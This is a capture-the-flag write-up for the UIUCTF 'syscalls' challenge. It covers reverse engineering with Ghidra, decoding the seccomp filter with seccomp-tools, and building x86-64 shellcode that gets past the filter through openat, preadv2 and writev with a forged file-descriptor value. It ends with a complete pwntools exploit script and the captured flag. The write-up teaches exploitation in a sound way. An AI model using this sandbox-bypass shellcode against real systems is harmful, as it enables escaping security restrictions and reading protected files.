uiuctf - syscalls

Welcome to my writeup for the UIUCTF challenge syscalls. This was an exceptional learning experience for me. To be frank, I spent more time on this than I would like to admit and I barely managed to solve it in time (less than 1 hour before the end of the CTF at 4 AM 😅). In this writeup (more of a walkthrough), I will explain my approach, mistakes, findings, and how I managed to solve it in the end. I will also try my best to explain concepts related to binaries in general and binary exploitation in specific.

Note: informational sections are marked with XTRA:

.init

The challenge description is:

Author: Nikhil

You can't escape this fortress of security.

`ncat --ssl syscalls.chal.uiuc.tf 1337`

We are also given two files: syscalls which is the target binary and also a Dockerfile which I ignored as usual because I'm too excited to start exploring the binary (thankfully it wasn't required this time 😂).

Running file on the binary we get the following:

syscalls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=19b78a52059d384f1b4def02d5838b625773369d, for GNU/Linux 3.2.0, stripped

So it's an Executable and Linkable Format (ELF) i.e. an executable file for linux. We also see that it's 64-bit and it's stripped meaning the symbols are removed such as the main function but it's not a big deal since we don't have many functions anyway so it's easy to keep track of addresses.

Then we run checksec to get an idea of the security mechanisms in place for the binary:

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX unknown - GNU_STACK missing
PIE:      PIE enabled
Stack:    Executable
RWX:      Has RWX segments

We see it is a Position-Independent Executable (PIE), this means that the program can be loaded into different locations of the memory (in the virtual address space). It makes it harder when we want to jump around in the binary as we have to leak the base of the binary first. You can read more about PIE here, anyway we won't have to worry about it in this challenge. The second thing we notice is that the stack is executable 🤨, this means we can run shellcode on the stack directly without having to use techniques like ROP.

Understanding the Program

Before jumping into Ghidra and decompiling the assembly instructions, it's always a good habit to start by running the program and interacting with it as this helps give a general overview which can help later on when reverse engineering.

Running the program we get the following output and then we are prompted for input:

>>> ./syscalls
The flag is in a file named flag.txt located in the same directory as this binary. That's all the information I can give you.

By entering a simple input we immediately get a segfault

>>> AAAABBBBCCCC
Segmentation fault

Trying again with a single character we also get an Illegal instruction which is weird, where are these instructions coming from?

>>> ./syscalls
The flag is in a file named flag.txt located in the same directory as this binary. That's all the information I can give you.
>>> a
Illegal instruction

By running dmesg, which is a utility that allows us to view the kernel's messages and errors

[125907.062999] RSP: 002b:00007fffffffdf38 EFLAGS: 00010202
[125907.063005] RAX: 00007fffffffdf70 RBX: 0000000000000000 RCX: 00007ffff7ead381
[125907.063009] RDX: 0000000000000000 RSI: 0000000000000002 RDI: 00007fffffffdf70
[125907.063012] RBP: 00007fffffffdf60 R08: 0000000000000000 R09: 0000000000000000
[125907.063015] R10: 00007ffff7ead381 R11: 0000000000000246 R12: 00007fffffffe148
[125907.063019] R13: 00005555555551c9 R14: 0000555555557da0 R15: 00007ffff7ffd040
[125907.063022] FS:  00007ffff7d84740 GS:  0000000000000000
[125946.099431] syscalls[207338]: segfault at 0 ip 00007fffffffdf70 sp 00007fffffffdf38 error 6

we see that the instruction pointer (ip) was set to 0x00007fffffffdf70 when the segfault happens which tells us that we started executing instructions on the stack (probably our buffer) which obviously failed since the data there was not valid instructions.

Enough guessing and let's dive into Ghidra 🐲

Static Analysis

After creating a project, loading the binary, and running the default analysis we see the entry function which always has as its first argument the main function

so after renaming and jumping to it we see the decompiled main function:

In red is the relevant part of the code, while the blue is typical initializations and checks. We see there is a buffer of size 184 which is passed to the first and third functions.

First Function

Logically, the next step is to start dissecting the three function. Note: from here on out I will rename variables as we go to gradually add semantic meaning to the code and get it closer to the original source code.

The first function prints the hint, and then reads 176 bytes into the input buffer from STDIN (i.e. input). Now given that we are reading 176 bytes into a 184-byte buffer, we are sure this not a buffer overflow situation.

Second Function

Moving on:

int second_func_prctl(void)

{
  int iVar1;
  long in_FS_OFFSET;
  undefined2 local_e8 [4];
  undefined8 *local_e0;
  undefined8 local_d8;
  undefined8 local_d0;
  undefined8 local_c8;
  undefined8 local_c0;
  undefined8 local_b8;
  undefined8 local_b0;
  undefined8 local_a8;
  undefined8 local_a0;
  undefined8 local_98;
  undefined8 local_90;
  undefined8 local_88;
  undefined8 local_80;
  undefined8 local_78;
  undefined8 local_70;
  undefined8 local_68;
  undefined8 local_60;
  undefined8 local_58;
  undefined8 local_50;
  undefined8 local_48;
  undefined8 local_40;
  undefined8 local_38;
  undefined8 local_30;
  undefined8 local_28;
  undefined8 local_20;
  undefined8 local_18;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_d8 = 0x400000020;
  local_d0 = 0xc000003e16000015;
  local_c8 = 0x20;
  local_c0 = 0x4000000001000035;
  local_b8 = 0xffffffff13000015;
  local_b0 = 0x120015;
  local_a8 = 0x100110015;
  local_a0 = 0x200100015;
  local_98 = 0x11000f0015;
  local_90 = 0x13000e0015;
  local_88 = 0x28000d0015;
  local_80 = 0x39000c0015;
  local_78 = 0x3b000b0015;
  local_70 = 0x113000a0015;
  local_68 = 0x12700090015;
  local_60 = 0x12800080015;
  local_58 = 0x14200070015;
  local_50 = 0x1405000015;
  local_48 = 0x1400000020;
  local_40 = 0x30025;
  local_38 = 0x3000015;
  local_30 = 0x1000000020;
  local_28 = 0x3e801000025;
  local_20 = 0x7fff000000000006;
  local_18 = 6;
  local_e0 = &local_d8;
  local_e8[0] = 0x19;
  prctl(38,1,0,0,0);
  iVar1 = prctl(22,2,local_e8);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return iVar1;
}

Honestly the decompilation looks daunting but it's because Ghidra has not identified the struct being used and instead split it up into 8-byte chunks on the stack but we will get back to that later. For now, we identify two important function calls using the prctl() function which is a wrapper for the prctl syscall

Third function

The third function does as we suspected, it runs the buffer as code (free shellcode).

XTRA: System Calls

Wikipedia defines system calls as:

In computing, a system call (commonly abbreviated to syscall) is the programmatic way in which a computer program requests a service from the operating system on which it is executed. This may include hardware-related services (for example, accessing a hard disk drive or accessing the device's camera), creation and execution of new processes, and communication with integral kernel services such as process scheduling. System calls provide an essential interface between a process and the operating system.

Basically, syscalls are a way for the program to safely interact with various physical devices (e.g. hard drive for reading/writing files), services, and processes. A list of all linux syscalls can be found here. Using syscalls is very similar to calling functions, we place the arguments in their respective registers, we choose the syscall number, then we invoke it using the syscall mnemonic

Before jumping into an example let's briefly explain file descriptors as well as they will come in handy later

File Descriptors

File descriptors are identifiers to files, pipes, or networks sockets. Using this ID, a process can tell the OS which file it is referring to. FDs can be obtained in multiple ways, one of which is the open syscall which takes the path name of the file as one of its arguments.

example

Back to our example, our goal is to write the contents of a file (for which we have already obtained a file descriptor) to STDOUT (to the terminal). We are going to use the sendfile syscall with the following signature

 #include <sys/sendfile.h>

ssize_t sendfile(int out_fd, int in_fd, off_t *_Nullable offset,
				size_t count);

// out_fd    -> rdi
// in_fd     -> rsi
// offset    -> rdx
// count     -> r10

Based on this we can construct the shellcode to print the file contents to terminal

mov rdi, 1        ; STDOUT (destination)
mov rsi, rax      ; assuming FD was in rax (source)
mov rdx, 0        ; print from start of file
mov r10d, 0x500   ; any size >= actual file size will work
mov rax, 40       ; syscall number
syscall

Second Function Continued

prctl, short for process control, allows the program to control characteristics about its own process (and child processes). The first argument specifies the operation which is defined in <linux/prctl.h> (link). For the first function call 38 maps to PR_SET_NO_NEW_PRIVS which prohibits the process from obtaining new privileges, we can skip this and focus on the second call to prctl with the option 22 PR_SET_SECCOMP which is used to set SECure COMPuting options, the second arguments is SECCOMP_MODE_STRICT which is mentioned in seccomp.h. The third argument is a pointer to a struct of type struct sock_fprog. By somehow obtaining the SECCOMP filter we would be able to determine which syscalls are allowed and which conditions are placed on their arguments. I gave up on trying to extract the filter from the Ghidra decompilation as it's unreliably and instead resolved to dynamic analysis.

Dynamic Analysis

Dumping the Filter from Memory

Pitfall: The Slow Way of Doing Things

Instead of looking for a tool to extract the SECCOMP filter automatically from the running process (spoiler alert: IT EXISTS!), I instead opted for the manual way: extracting the filter by hand from memory. I made the mistake of relying on Ghidra's offsets for the variables which turned out to be inconsistent with the disassembled instructions.

When I finally got the correct address of the filters from memory by using strace which gave the address of the struct, I was now faced with the task of decoding the filter.

>>> strace ./syscalls
prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)  = 0
prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, {len=25, filter=0x7fffffffde80}) = 0

At this point I started looking for a tool to decode the filter bytes I extracted from memory. The filters are written in the Berkley Packet Filter format which is used for writing filters for many purposes but was originally made for network packets. I stumbled upon seccomp-tools which offer a suite of tools for reading, dumping, and decoding BPF filters with regards to SECCOMP.

XTRA: Filter struct description from linux docs

Using the Correct Tool for the Job

By running seccomp-tools dump -c ./syscalls, I was able to get the decoded SECCOMP filters in a well-formatted style without having to worry about dumping the filters by hand.

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x16 0xc000003e  if (A != ARCH_X86_64) goto 0024
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x13 0xffffffff  if (A != 0xffffffff) goto 0024
 0005: 0x15 0x12 0x00 0x00000000  if (A == read) goto 0024
 0006: 0x15 0x11 0x00 0x00000001  if (A == write) goto 0024
 0007: 0x15 0x10 0x00 0x00000002  if (A == open) goto 0024
 0008: 0x15 0x0f 0x00 0x00000011  if (A == pread64) goto 0024
 0009: 0x15 0x0e 0x00 0x00000013  if (A == readv) goto 0024
 0010: 0x15 0x0d 0x00 0x00000028  if (A == sendfile) goto 0024
 0011: 0x15 0x0c 0x00 0x00000039  if (A == fork) goto 0024
 0012: 0x15 0x0b 0x00 0x0000003b  if (A == execve) goto 0024
 0013: 0x15 0x0a 0x00 0x00000113  if (A == splice) goto 0024
 0014: 0x15 0x09 0x00 0x00000127  if (A == preadv) goto 0024
 0015: 0x15 0x08 0x00 0x00000128  if (A == pwritev) goto 0024
 0016: 0x15 0x07 0x00 0x00000142  if (A == execveat) goto 0024
 0017: 0x15 0x00 0x05 0x00000014  if (A != writev) goto 0023
 0018: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # writev(fd, vec, vlen)
 0019: 0x25 0x03 0x00 0x00000000  if (A > 0x0) goto 0023
 0020: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0024
 0021: 0x20 0x00 0x00 0x00000010  A = fd # writev(fd, vec, vlen)
 0022: 0x25 0x00 0x01 0x000003e8  if (A <= 0x3e8) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x06 0x00 0x00 0x00000000  return KILL

Pitfall: The Naive Approach

Due to my inexperience with the linux kernel and I had the brilliant idea of overwriting the SECCOMP rules by injecting my own filters which allow everything and then invoking the prctl or the seccomp syscalls to invoke the changes. After hours of crafting a payload byte by byte and looking out for struct alignment and so on I get the following errno EINVAL which according to the man page can be the result of one of the following:

EINVAL operation is unknown or is not supported ...

EINVAL The specified flags are invalid ...

EINVAL operation included BPF_ABS, but the specified offset ...

EINVAL A secure computing mode has already been set, and
	  operation differs from the existing setting.

EINVAL operation specified SECCOMP_SET_MODE_FILTER, but the
	  filter program pointed to by args was not valid or the
	  length of the filter program was zero or exceeded
	  BPF_MAXINSNS (4096) instructions.

I still wasn't sure if it was because of the 4th or the 5th reason so I looked for another approach which was SECCOMP_SET_MODE_STRICT which basically sets a predefined filter that only allows read, write, and exit. This was easier to test since I didn't have to provide pointers or worry about offsets or alignment. When this method also resulted in the same errno I immediately knew it was because of the 4th reason. What's the point of being able to overwrite them after they have been set?

Bypassing the Filter

Now I knew the only way to leak the flag is to somehow bypass the filter. Reading writeups for similar challenges and SECCOMP bypass guides I realized that there are alternatives to the important syscalls (open, write, read) not included in the filter. The syscalls explained below are in the order they are executed and the stack representation rolls over the three syscalls.

open -> openat

openat opens a file relative to a directory file descriptor. Which is fine as we can use the current directory FD

push 1
dec byte ptr [rsp]
mov rax, 0x7478742e67616c66
push rax
/* call openat */
push SYS_openat
pop rax
mov rsi, rsp
mov rdi, 0xFFFFFF9C
mov rdx, 0
syscall

/* stack repr after */
+----------------+
|      ...       |
|                |
|                |
|  0x67616c66    | ("flag.txt") / RSP
|  0x7478742e    |
|       0        |
+----------------+

read -> preadv2

preadv2 is similar to read but allows for reading to multiple buffers instead of one.

ssize_t preadv2(int fd, const struct iovec *iov, int iovcnt, off_t offset, int flags);

For our case we just need one. Another point to consider is that unlike read, preadv2 does not take a pointer to a char buffer, instead it take a pointer to an iovec struct.

struct iovec {
   void   *iov_base;  /* Starting address */
   size_t  iov_len;   /* Size of the memory pointed to by iov_base. */
};

Another point is that we are going to utilize the stack by "allocating" the buffer at a safe offset from RSP. Putting this together we get the following:

/* call preadv2 */
mov rdi, rax
push 70                     ; number of bytes to read
mov rax, rsp
push rax
add dword ptr [rsp], 0x4e   ; the buffer
mov rsi, rsp                ; pointer to the buffer

xor rdx, rdx 
mov dl, 1                   ; number of buffers
xor r10, r10   
xor r8, r8         
mov rax, 327 
syscall

/* stack repr after */
+----------------+
|      ...       |
|                |
|                |
|  RSP + offset  | RSP
|      70        |
|  0x67616c66    | ("flag.txt")
|  0x7478742e    |
|       0        |
+----------------+

write -> writev

This is the signature of writev:

ssize_t writev(int fd, const struct iovec *iov, int iovcnt);

we can see that, similar to preadv2, it takes a pointer an iovec struct which is handy since we already have it on the stack from above. Moving on, in the filter we can see that writev is not blocked, however, there is a condition placed on the FD argument:

 0017: 0x15 0x00 0x05 0x00000014  if (A != writev) goto 0023
 0018: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # writev(fd, vec, vlen)
 0019: 0x25 0x03 0x00 0x00000000  if (A > 0x0) goto 0023
 0020: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0024
 0021: 0x20 0x00 0x00 0x00000010  A = fd # writev(fd, vec, vlen)
 0022: 0x25 0x00 0x01 0x000003e8  if (A <= 0x3e8) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x06 0x00 0x00 0x00000000  return KILL

If any of the upper 32 bits is 1, then the syscall is permitted. Furthermore, the size of FDs on a 64-bit linux system is 4 bytes (32 bits). So only the 4 lower bytes of rdi will be considered for the actual file descriptor that will be passed to the kernel. Therefore, we are free to change the upper 4 to anything that bypasses the filter, so I set the highest bit to 1 to satisfy this condition.

mov rdi, 0x1000000000000001
mov rsi, rsp                  ; using our make-shift buffer as input
xor rdx, rdx      
mov dl, 1         
xor r10, r10      
mov rax, 20
syscall

+----------------+
|      ...       |
|                |
|                |
|  RSP + offset  | RSP
|      70        |
|  0x67616c66    | ("flag.txt")
|  0x7478742e    |
|       0        |
+----------------+

Final Payload

With this we have all the ingredients to leak the flag. Putting it all together we get:

from pwn import *

elf = context.binary = ELF("syscalls")
if args.REMOTE:
    p = remote("syscalls.chal.uiuc.tf", 1337, ssl=True)

else:
    p = process()

shellcode = r"""    /* push b'flag.txt\x00' */
    push 1
    dec byte ptr [rsp]
    mov rax, 0x7478742e67616c66
    push rax
    /* call openat */
    push SYS_openat
    pop rax
    mov rsi, rsp
    mov rdi, 0xFFFFFF9C
    mov rdx, 0
    syscall
    /* call preadv2 */
    mov rdi, rax
    push 70
    mov rax, rsp
    push rax
    add dword ptr [rsp], 0x4e
    mov rsi, rsp
    
    xor rdx, rdx 
    mov dl, 1      
    xor r10, r10   
    xor r8, r8         
    mov rax, 327 
    syscall

    mov rdi, 0x1000000000000001
    mov rsi, rsp
    xor rdx, rdx      
    mov dl, 1         
    xor r10, r10      
    mov rax, 20
    syscall           
   """


shellcode = asm(shellcode)
p.recvuntil("you.\n".encode())
p.sendline(shellcode)
p.interactive()

FLAG: uiuctf{a532aaf9aaed1fa5906de364a1162e0833c57a0246ab9ffc} 🎊

.fini (Conclusion and Learnings)

This challenge was a difficult one for me but it is undoubtedly the one I learned from the most both in terms of technical knowledge and problem solving / mindset. I hope you enjoyed this writeup, feel free to share with me your feedback and suggestions.

Thank you 👍🏻

Last updated